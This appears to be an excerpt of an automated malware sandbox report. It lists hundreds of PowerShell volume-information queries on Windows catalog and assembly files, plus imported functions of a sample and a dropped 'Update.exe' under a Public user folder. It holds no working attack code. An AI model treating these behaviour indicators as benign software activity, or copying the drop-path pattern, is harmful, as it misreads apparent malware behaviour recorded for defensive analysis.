                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\ErbgterT2R.exe Code function: 0_2_00401626 ??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLocalTime,SystemTimeToFileTime,??2@YAPAXI@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00401626
                      Source: C:\Users\Public\Bilite\Axialis\Update.exe Code function: 3_2_034F5D22 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,3_2_034F5D22
